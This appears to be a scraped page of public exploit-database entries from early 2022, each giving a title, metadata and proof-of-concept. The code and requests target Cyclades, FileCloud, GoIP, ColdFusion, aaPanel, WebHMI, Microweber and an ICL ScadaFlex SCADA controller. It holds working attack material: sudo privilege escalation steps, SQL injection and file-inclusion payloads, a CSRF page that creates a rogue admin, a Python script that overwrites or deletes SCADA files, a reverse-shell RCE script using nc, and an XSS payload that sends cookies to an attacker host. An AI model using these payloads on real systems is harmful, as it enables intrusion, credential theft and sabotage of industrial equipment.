-
Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation # Date: 09 Feb 2022 # Exploit Author: @ibby # Vendor Homepage: https://www.vertiv.com/en-us/ # Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N/A # The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges ## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014. ### This vulnerability does not exist in the newer distributions of the ACS Software. #!/bin/bash ## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system. ## The software is publicly available, this will grab it and unpack the firmware for you. #TMPDIR=$(mktemp -d) #curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin #sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers" #echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky." # ! EXPLOIT CODE BELOW ! # # ------- # Once you exit the root shell, this will clean up and put the binaries back where they belong. echo "Creating backups of sed & bash binaries" sudo cp /bin/sed /bin/sed.bak sudo cp /bin/bash /bin/bash.bak echo "Saved as bash.bak & sed.bak" sudo mv /bin/bash /bin/sed sudo /bin/sed echo "Replacing our binary with the proper one" sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed
-
FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https://www.filecloud.com/ # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation) # Conditions 1. Only vulnerable if cookies have samesite set to None (SameSite=None). echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php 2. Use https as target url (When cookies set SameSite=None, also set Secure). # PoC (HTML) <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <script> function init(){ myFormData = new FormData(); let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'}); myFormData.append("uploadFormElement", fileContent, "user.csv"); fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"}); } </script> </head> <body onload="init()"> CSRF PoC for CVE-2022-25241 Creat hacker user with Password1 via CSV file upload. 
</body> </html> # HTTPS Request POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1 Host: 192.168.159.129:8443 Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493 Content-Length: 365 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW Connection: close ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv" Content-Type: application/vnd.ms-excel UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW-- # CSV file format UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES
-
Dbltek GoIP - Local File Inclusion
# Exploit Title: Dbltek GoIP - Local File Inclusion # Date: 20.02.2022 # Exploit Author: Valtteri Lehtinen & Lassi Korhonen # Vendor Homepage: http://en.dbltek.com/index.html # Software Link: - # Version: GHSFVT-1.1-67-5 (firmware version) # Tested on: Target is an IoT device # Exploit summary Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP. The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities. Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up. It is probable that also other models and versions of Dbltek GoIP devices are affected. Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ # Proof of Concept Assuming the device is available on IP 192.168.9.1. Download /etc/passwd http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up) http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
-
Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path # Discovery by: Johto Robbie # Discovery Date: May 12, 2021 # Tested Version: 2.52.13001.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 Home # Steps to discover the Unquoted Service Path: Go to Start and type cmd. Enter the following command and press Enter: C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """ Gaming Services GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto Gaming Services GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto C:\Users\Bang's>sc qc "GamingServices" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GamingServices TYPE : 210 WIN32_PACKAGED_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Gaming Services DEPENDENCIES : staterepository SERVICE_START_NAME : LocalSystem The service's binary path is not quoted, and the binary lives under C:\Program Files. Place a malicious application named "progarm.exe", then stop and start GamingServices: "progarm.exe" will be executed. #Exploit: An unquoted service path in Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe could lead to privilege escalation during the installation process that is performed when an executable file is registered. This could further lead to complete compromise of confidentiality, integrity and availability. #Timeline May 12, 2021 - Reported to Microsoft Feb 11, 2022 - Confirmed vulnerability has been fixed
-
Simple Real Estate Portal System 1.0 - 'id' SQLi
# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection # Date: 22/02/2022 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux # Sqlmap command: sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
-
Air Cargo Management System v1.0 - SQLi
# Title: Air Cargo Management System v1.0 - SQLi # Author: nu11secur1ty # Date: 02.18.2022 # Vendor: https://www.sourcecodester.com/users/tips23 # Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System # Description: The `ref_code` parameter from Air Cargo Management System v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+' was submitted in the ref_code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain redirection, or internal whatever, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: ref_code (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=trace&ref_code=258044'+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'' AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki ---
-
aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu The application is vulnerable to directory traversal; an authenticated attacker can read the root user's private SSH key (id_rsa). #Go to App Store #Click "install" on any free plugin. #Change the installation script path to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://IP:7800 Referer: http://IP:7800/soft Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0; request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd; serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13; page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot; distribution=ubuntu; serial_no=; pro_end=-1; load_page=null; load_type=null; load_search=undefined; force=0; rank=list; Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/; path_dir_change=/www/wwwroot/ Connection: close num=10&filename=../../../root/.ssh/id_rsa
-
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remote Code Execution (RCE)
# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) # Google Dork: intext:"adobe coldfusion 11" # Date: 2022-22-02 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html # Version: Adobe Coldfusion (11.0.03.292866) # Tested on: Microsoft Windows Server & Linux # Description: # ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution. # JNDI attack via the 'verifyldapserver' parameter on the utils.cfc ==================== 1.Setup rogue-jndi Server ==================== https://github.com/veracode-research/rogue-jndi ==================== 2.Preparing the Attack ======================= java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box" ==================== 3.Launch the Attack ========================== http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json curl -i -s -k -X $'GET' \ -H $'Host: target' \ --data-binary $'\x0d\x0a\x0d\x0a' \ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json' ==================== 4.RCE ======================================= Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8 Can be done by modify the pom.xml as below <configuration> <source>7</source> <target>7</target> </configuration>
-
Student Record System 1.0 - 'cid' SQLi (Authenticated)
# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated) # Exploit Author: Mohd. Anees # Contact: https://www.linkedin.com/in/aneessecure/ # Software Homepage: https://phpgurukul.com/student-record-system-php/ # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 22.02.2022 ######## Description ######## # # # Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work # # http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt Connection: close
-
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD
# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # # # Vendor: Industrial Control Links, Inc. # Product web page: http://www.iclinks.com # Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf # Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 # SW: 1.02.20 (build 286), WebLib: 1.24 # SW: 1.02.15 (build 286), WebLib: 1.22 # SW: 1.02.01 (build 229), WebLib: 1.16 # SW: 1.01.14 (build 172), WebLib: 1.14 # SW: 1.01.01 (build 2149), WebLib: 1.13 # # # Summary: Scadaflex II controllers are 100% web based # for both configuration and user interface. No applications # are required other than any standard web browser. They # are easily supported by remote access over the Internet # or a cellular link. Scadaflex II controllers support # industry standard wired communications using Modbus, # DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial # bridging for Modbus or any other protocol. Each Scadaflex # II controller has both analog and digital, inputs and # outputs, sufficient for pumping stations, irrigation # controls, and other similar process monitoring and control # applications. They can also serve as communications # concentrators and protocol converters that enhance the # operation of existing PLCs and process equipment. # # Desc: The SCADA controller is vulnerable to unauthenticated # file write/overwrite and delete vulnerability. This allows # an attacker to execute critical file CRUD operations on the # device that can potentially allow system access and impact # availability. 
# # Tested on: SCADA HTTP Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5698 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php # # CVE ID: CVE-2022-25359 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 # # # 06.11.2021 # import time,sys import requests import datetime import showtime # Default # AES Encryption Key = 'ABCD1234abcd:ICL' def bann(): print(''' ---------------------------------------------------------- ) ) ) ) ) ) ( ( ( ( ( ( ) ) ) ) ) ) (~~~~~~~~~) (~~~~~~~~~) | t00t | | w00t | | | | | I _._ I _._ I /' `\\ I /' `\\ I | M | I | J | f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| .' | ||~~~~~~~~| | .' | | |~~~~~~~~| | /'______|___||__###___|____|/'_______|____|_|__###___|___| ScadaFlex II SCADA Controllers Remote write/delete PoC ZSL-2022-5698 ---------------------------------------------------------- ''') def safe(*trigger, ): return True # |-| Safety Switch def choice(n): try: if n == 1: overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) elif n == 2: delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) else: print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') print('Usage (Delete): ./sflex.py [IP] [File position number]') raise SystemExit('t00t') except Exception as tip: raise SystemExit(tip) def jump(): choice(1) if len(sys.argv) == 4 else next choice(2) if len(sys.argv) == 3 else next def overwrite(controllerip, filepos): print('Starting script at', start) localfile = sys.argv[2] with open(localfile, 'rb') as opener: scadaurl = 'http://' scadaurl += controllerip scadaurl += '/d.php?N' scadaurl += str(filepos) scadaurl += ',73,' scadaurl += opener.name scadaurl += '~' scadaurl += str(int(time.time())) see = requests.post(scadaurl, files = {'upload' : opener}) if '100' in see.text: print('File uploaded in {} directory at position {}.'.format('l', filepos)) print('URL: 
http://' +controllerip+ '/l/' +localfile) else: print("- controller webserver error.") exit() def delete(controllerip, filepos): print('Starting script at', start) exit(42) if isinstance(filepos, str) else next scadaurl = 'http://' scadaurl += controllerip scadaurl += '/rW12IcL_Dat_N' scadaurl += str(filepos) scadaurl += ',0=1~' scadaurl += str(int(time.time())) see = requests.get(scadaurl) check = '\x72\x57' #| check += '\x31\x32' #| check += '\x49\x63' #| check += '\x4c\x5f' #| check += '\x44\x61' #| check += '\x74\x5f' #| check += '\x4e'# o' #| check += str(filepos)#| check += '\x2c\x30' #| check += '\x09\x52' #| if check in see.text: print('File at position {} deleted.'.format(filepos)) else: print('- controller webserver error.') exit() def main(): if safe(True): print('Careful...\nSafety: ON') exit(17) else: print('Safety: OFF', end = '') global start start = datetime.datetime.now() start = start.strftime('%d.%m.%Y %H:%M:%S') bann(), jump(), choice(1959) if __name__ == "__main__": main()
-
WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") print("Level2 account must be enabled !\n"); login = "admin" password = "admin" class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" payload = "<?php+system($_GET['c']);+?>" headers_login = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Bypassing basedir...') for i in range(0, len(payload)): #print(payload[i]) rp = r.get(url + 
'/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies) time.sleep(0.2) print('[*] Setting up listener...') listener = subprocess.Popen(["nc", "-nlp", self.localport]) time.sleep(2) print('[*] Executing payload...') time.sleep(1) print('[*] Waiting reverse shell...') r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies) if (r4.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
-
WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Log in to the admin account 2. Add a new register or create a new dashboard, insert the payload <script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script> in the Title field and save. # The Dashboard section immediately affects all logged-in users. #Listener log: GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1 Host: 192.168.0.169:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-GPC: 1 Referer: http://192.168.0.153/ Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
-
Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated) # Date: 22.02.2022 # Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com> # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip # Version: Microweber CMS v1.2.10 # Tested on: Microweber CMS v1.2.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)', 'Description' => %q{ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem. Upload function may delete the local file if the web service user has access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Talha Karakumru <talhakarakumru[at]gmail.com>' ], 'References' => [ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/'] ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ OS_RESOURCE_LOSS ] }, 'Targets' => [ [ 'Microweber v1.2.10', {} ] ], 'Privileged' => true, 'DisclosureDate' => '2022-01-30' ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']), OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']), OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']), OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']), OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'login') }) if res.nil? 
fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.') end print_status 'Checking if it\'s Microweber CMS.' if res.code == 200 && !res.body.include?('Microweber') print_error 'Microweber CMS has not been detected.' Exploit::CheckCode::Safe end if res.code != 200 fail_with(Failure::Unknown, res.body) end print_good 'Microweber CMS has been detected.' return check_version(res.body) end def check_version(res_body) print_status 'Checking Microweber\'s version.' begin major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.') version = Rex::Version.new("#{major}.#{minor}.#{build}") rescue NoMethodError, TypeError return Exploit::CheckCode::Safe end if version == Rex::Version.new('1.2.10') print_good 'Microweber version ' + version.to_s return Exploit::CheckCode::Appears end print_error 'Microweber version ' + version.to_s if version < Rex::Version.new('1.2.10') print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.' return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def try_login print_status 'Trying to log in.' res = send_request_cgi({ 'method' => 'POST', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'lang' => '', 'where_to' => 'admin_content' } }) if res.nil? fail_with(Failure::Unreachable, 'Log in request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end json_res = res.get_json_document if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.' fail_with(Failure::BadConfig, 'Wrong username or password.') end if !json_res['success'].nil? && json_res['success'] == 'You are logged in' print_good 'You are logged in.' 
return end fail_with(Failure::Unknown, 'An unknown error occurred.') end def try_upload print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'), 'vars_get' => { 'src' => datastore['LOCAL_FILE_PATH'] }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Upload request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['success'] print_good json_res['success'] return end fail_with(Failure::Unknown, res.body) end fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.') end def try_download filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1] print_status 'Downloading ' + filename + ' from the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'), 'vars_get' => { 'filename' => filename }, 'headers' => { 'Referer' => referer } }) if res.nil? 
fail_with(Failure::Unreachable, 'Download request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['error'] fail_with(Failure::Unknown, json_res['error']) return end end print_status res.body end def run if datastore['DEFANGED_MODE'] warning = <<~EOF Triggering this vulnerability may delete the local file if the web service user has the permission. If you want to continue, disable the DEFANGED_MODE. => set DEFANGED_MODE false EOF fail_with(Failure::BadConfig, warning) end try_login try_upload try_download end end
-
Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
